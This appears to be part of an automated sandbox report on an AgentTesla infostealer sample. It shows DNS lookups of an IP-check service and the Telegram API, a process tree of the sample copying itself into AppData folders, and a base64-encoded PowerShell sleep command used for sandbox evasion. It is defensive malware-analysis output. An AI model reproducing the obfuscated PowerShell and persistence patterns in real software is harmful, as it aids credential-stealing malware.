                                              Mar 20, 2023 19:38:19.580924988 CET53596838.8.8.8192.168.2.4
                                              Mar 20, 2023 19:38:26.481441975 CET6416753192.168.2.48.8.8.8
                                              Mar 20, 2023 19:38:26.498725891 CET53641678.8.8.8192.168.2.4
                                              Mar 20, 2023 19:39:25.449285030 CET5223953192.168.2.48.8.8.8
                                              Mar 20, 2023 19:39:25.469089985 CET53522398.8.8.8192.168.2.4
                                              Mar 20, 2023 19:39:25.475931883 CET5680753192.168.2.48.8.8.8
                                              Mar 20, 2023 19:39:25.498383999 CET53568078.8.8.8192.168.2.4
                                              Mar 20, 2023 19:39:47.851300955 CET6100753192.168.2.48.8.8.8
                                              Mar 20, 2023 19:39:47.876548052 CET53610078.8.8.8192.168.2.4
                                              Mar 20, 2023 19:39:47.912009001 CET6068653192.168.2.48.8.8.8
                                              Mar 20, 2023 19:39:47.930107117 CET53606868.8.8.8192.168.2.4
                                              Mar 20, 2023 19:39:50.132524967 CET6112453192.168.2.48.8.8.8
                                              Mar 20, 2023 19:39:50.152019978 CET53611248.8.8.8192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Mar 20, 2023 19:38:19.534012079 CET192.168.2.48.8.8.80x8136Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:38:19.561065912 CET192.168.2.48.8.8.80xdac7Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:38:26.481441975 CET192.168.2.48.8.8.80xcca0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:25.449285030 CET192.168.2.48.8.8.80x51a8Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:25.475931883 CET192.168.2.48.8.8.80x749dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:47.851300955 CET192.168.2.48.8.8.80x296dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:47.912009001 CET192.168.2.48.8.8.80x3d84Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:50.132524967 CET192.168.2.48.8.8.80x85fbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Mar 20, 2023 19:38:19.553659916 CET8.8.8.8192.168.2.40x8136No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                              Mar 20, 2023 19:38:19.553659916 CET8.8.8.8192.168.2.40x8136No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:38:19.553659916 CET8.8.8.8192.168.2.40x8136No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:38:19.553659916 CET8.8.8.8192.168.2.40x8136No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:38:19.580924988 CET8.8.8.8192.168.2.40xdac7No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                              Mar 20, 2023 19:38:19.580924988 CET8.8.8.8192.168.2.40xdac7No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:38:19.580924988 CET8.8.8.8192.168.2.40xdac7No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:38:19.580924988 CET8.8.8.8192.168.2.40xdac7No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:38:26.498725891 CET8.8.8.8192.168.2.40xcca0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:25.469089985 CET8.8.8.8192.168.2.40x51a8No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                              Mar 20, 2023 19:39:25.469089985 CET8.8.8.8192.168.2.40x51a8No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:25.469089985 CET8.8.8.8192.168.2.40x51a8No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:25.469089985 CET8.8.8.8192.168.2.40x51a8No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:25.498383999 CET8.8.8.8192.168.2.40x749dNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                              Mar 20, 2023 19:39:25.498383999 CET8.8.8.8192.168.2.40x749dNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:25.498383999 CET8.8.8.8192.168.2.40x749dNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:25.498383999 CET8.8.8.8192.168.2.40x749dNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:47.876548052 CET8.8.8.8192.168.2.40x296dNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                              Mar 20, 2023 19:39:47.876548052 CET8.8.8.8192.168.2.40x296dNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:47.876548052 CET8.8.8.8192.168.2.40x296dNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:47.876548052 CET8.8.8.8192.168.2.40x296dNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:47.930107117 CET8.8.8.8192.168.2.40x3d84No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                              Mar 20, 2023 19:39:47.930107117 CET8.8.8.8192.168.2.40x3d84No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:47.930107117 CET8.8.8.8192.168.2.40x3d84No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:47.930107117 CET8.8.8.8192.168.2.40x3d84No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                              Mar 20, 2023 19:39:50.152019978 CET8.8.8.8192.168.2.40x85fbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • api.ipify.org
                                              • api.telegram.org

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:19:37:41
                                              Start date:20/03/2023
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\file.exe
                                              Imagebase:0x680000
                                              File size:1825280 bytes
                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Target ID:1
                                              Start time:19:37:49
                                              Start date:20/03/2023
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                              Imagebase:0xd30000
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              General

                                              Target ID:2
                                              Start time:19:37:49
                                              Start date:20/03/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7c72c0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:3
                                              Start time:19:38:14
                                              Start date:20/03/2023
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\Desktop\file.exe
                                              Imagebase:0x120000
                                              File size:1825280 bytes
                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low

                                              General

                                              Target ID:4
                                              Start time:19:38:15
                                              Start date:20/03/2023
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\file.exe
                                              Imagebase:0x810000
                                              File size:1825280 bytes
                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Target ID:5
                                              Start time:19:38:26
                                              Start date:20/03/2023
                                              Path:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                                              Imagebase:0xb0000
                                              File size:1825280 bytes
                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 36%, ReversingLabs
                                              • Detection: 44%, Virustotal, Browse
                                              Reputation:low

                                              General

                                              Target ID:8
                                              Start time:19:38:35
                                              Start date:20/03/2023
                                              Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                              Imagebase:0xff0000
                                              File size:1825280 bytes
                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 36%, ReversingLabs
                                              Reputation:low

                                              General

                                              Target ID:9
                                              Start time:19:38:45
                                              Start date:20/03/2023
                                              Path:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                                              Imagebase:0xf20000
                                              File size:1825280 bytes
                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:low

                                              General

                                              Target ID:10
                                              Start time:19:38:48
                                              Start date:20/03/2023
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                              Imagebase:0xd30000
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              General

                                              Target ID:11
                                              Start time:19:38:48
                                              Start date:20/03/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7c72c0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:12
                                              Start time:19:38:55
                                              Start date:20/03/2023
                                              Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                              Imagebase:0x840000
                                              File size:1825280 bytes
                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:low

                                              General

                                              Target ID:13
                                              Start time:19:39:16
                                              Start date:20/03/2023
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                              Imagebase:0xd30000
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              General

                                              Target ID:14
                                              Start time:19:39:16
                                              Start date:20/03/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7c72c0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:15
                                              Start time:19:39:21
                                              Start date:20/03/2023
                                              Path:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                              Imagebase:0x670000
                                              File size:1825280 bytes
                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET

                                              General

                                              Target ID:19
                                              Start time:19:39:45
                                              Start date:20/03/2023
                                              Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                              Imagebase:0xf20000
                                              File size:1825280 bytes
                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                              Disassembly

                                              No disassembly